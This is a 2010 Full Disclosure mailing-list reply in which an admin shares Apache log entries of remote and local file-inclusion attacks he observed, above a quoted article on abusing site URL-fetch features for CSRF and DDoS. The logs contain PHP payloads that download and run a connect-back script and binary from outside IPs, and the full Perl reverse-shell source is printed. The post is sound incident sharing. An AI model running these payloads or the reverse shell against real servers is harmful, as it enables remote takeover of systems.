Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: Using of the sites for attacks on other sites
From: mrx <mrx () propergander org uk>
Date: Wed, 30 Jun 2010 08:22:29 +0100

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I have been witnessing such attacks in the past few weeks. Most of the urls are trying to exploit components of web 
software that I do not have
installed. Some do GET existing pages such as index.php and tag the attack on the end. Such attacks began about 2 weeks 
ago. These attacks have
so far come from three different IP addresses. and I was getting around a dozen such accesses every other day. I think 
my server is pretty
secure, but I am a novice so what do I really know? And as such I have blocked these IP's from accessing my server. FYI 
The originating IP's all
have wordpress blogs on them.

If anyone is interested here is one such attack:

<apache2 log entry>

88.181.49.182 - - [28/Jun/2010:19:54:35 +0100] "GET
/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://212.154.190.140/back.txt?? HTTP/1.1" 
404 220 "-"
"<?system('cd /var/tmp;wget http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;wget 
http://212.154.190.140/cback;chmod +x cback;./cback
192.24.5.30 80;cd /dev/shm;curl -O http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;curl -O 
http://212.154.190.140/cback;chmod +x
cback;./cback 192.24.5.30 80');?>;<?exec_shell('cd /var/tmp;wget http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 
80;wget
http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O 
http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30
80;curl -O http://212.154.190.140/cback;chmod +x cback;./cback 192.24.5.30 80');?>;<?passthru('cd /var/tmp;wget
http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;wget http://212.154.190.140/cback;chmod +x cback;./cback 
192.24.5.30 80;cd
/dev/shm;curl -O http://212.154.190.140/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://212.154.190.140/cback;chmod +x 
cback;./cback
192.24.5.30 80');?> ; Ustupid MF is Back ; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Here is another example:

94.199.181.165 - - [21/Jun/2010:05:36:27 +0100] "GET
/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 3775 "-" 
"<?system('cd /var/tmp;wget
http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget http://195.239.120.69/cback;chmod +x cback;./cback 
192.24.5.30 80;cd /dev/shm;curl
- -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 
192.24.5.30 80');?>
;<?exec_shell('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget 
http://195.239.120.69/cback;chmod +x cback;./cback
192.24.5.30 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;curl -O 
http://195.239.120.69/cback;chmod +x
cback;./cback 192.24.5.30 80');?> ;<?passthru('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 
80;wget
http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl 
cb.txt 192.24.5.30
80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80');?>;Ustupid MF is Back; Mozilla/4.0 
(compatible; MSIE 6.0; Windows
98)"

</apache2 log entries>

<cb.txt content>

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";HISTFILE=/dev/null /bin/sh -i';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);


</cb.txt content>

If anyone would like more log entries let me know.

If all this is beneath you guys.... sorry I bothered you.

regards
Dave

On 28/06/2010 21:13, MustLive wrote:
Hello participants of Full-Disclosure!

For last two months I didn't post my articles to this list due to some not
serious moaning in April on some of my articles (you always can find my
articles at my site and in WASC Mailing List). But at the end of June I
decided to remind you about my last articles.

Recently I wrote new article Using of the sites for attacks on other sites
(http://websecurity.com.ua/4322/). This is brief English version of it.

Last year in article DoS attacks via Abuse of Functionality vulnerabilities
(it was mentioned at
http://jeremiahgrossman.blogspot.com/2010/01/top-ten-web-hacking-techniques-of-2009.html)
I told about possibility of conducting of DoS attacks via Abuse of
Functionality vulnerabilities at other sites. Particularly I showed examples
of such vulnerabilities at web sites regex.info and www.slideshare.net.
These attacks can be as unidirectional DoS, as bidirectional DoS, depending
on capacities of both servers.

And now I'll tell you about possibility of conducting of CSRF attacks on
other sites via Abuse of Functionality vulnerabilities. Researching of such
attacks I begun already at 2007 when found such vulnerability at regex.info.

Using of Abuse of Functionality for attacks on other sites.

Sites, which allow to make requests to other web sites (to arbitrary web
pages), have Abuse of Functionality vulnerability and can be used for
conducting of CSRF attacks on other sites. Including DoS attacks via Abuse
of Functionality, as it was mentioned above. CSRF attacks can be made only
to those pages, which don't require authorization.

For these attacks it's possible to use as Abuse of Functionality
vulnerabilities (similar to mentioned in this article), as Remote File
Include vulnerabilities (like in PHP applications) - it's Abuse of
Functionality via RFI.

This attack method can be of use when it's needed to conduct invisible CSRF
attack on other site (to not show yourself), for conducting of DoS and DDoS
attacks and for conducting of other attacks, particularly for making
different actions which need to be made from different IP. For example, at
online voting, for turning of hits of counters and hits of advertising at
the site, and also for turning of clicks (click fraud).

Abuse of Functionality:

Attack is going at request of one site (http://site) to another
(http://another_site) at using of appropriate function of the site
(http://site/script).

http://site/script?url=http://another_site

Advantages of this attack method.

In this part of the article I wrote a list of advantages of this attack
method. And I mentioned another two important paragraphs:

Note, that this DoS attack is possible to use for attacks on redirectors,
which I wrote about in my articles Redirector’s hell and Hellfire for
redirectors.

Also at conducting of DoS attacks it's possible to use several such servers
at once and so to conduct DDoS attack. In such case these servers will be
appearing as zombie-computers. I.e. botnet will be made from not home
computers, but from web servers (which can have larger capacities and faster
connections). So these vulnerabilities can lead to appearing of new class of
botnets (with zombie-servers).

Examples of vulnerable web sites and web services.

In this part of the article I showed examples of different web sites and web
services which could be used for conducting of attacks on other sites.
Including regex.info, www.slideshare.net, anonymouse.org, www.google.com,
translate.google.com, babelfish.altavista.com, babelfish.yahoo.com,
keepvid.com, web application Firebook, W3C validators and iGoogle.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


- -- 
Mankind's systems are white sticks tapping walls.
Thanks Roy
http://www.propergander.org.uk
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBTCrwtbIvn8UFHWSmAQLN3gf/Z9Jk5uvNnPxF0JWIvziYJP0XBTiCE6uq
AInlGmQnEOcLXZDROfzYFpwe4DK1eAdCvRu4tKAvsd12fbgPBFqDLXDbE+Pscja8
5FMLOBdcEDav2E6u7+oZbslA79h040CTw6Hl8v9u8EEK3yiP8Tt8zL2Sb2omTMqu
jfIk6Nqs6fx+6hkj3da5hYH+JZ5jz12o50aRXoAqbqkpwapukI3MQvVvoTcvfJgb
cEToFjqIWE1jALHN7DAJGPF8RDBQVmzYcSdDCSbgGDC/HMZEBblD2TsLMmaNqVqm
ydgSib1wQQW634aEeLdxmN+0A5XONgkB9MfAVvwgjqPX3S9JV2Ufzw==
=Y7oL
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault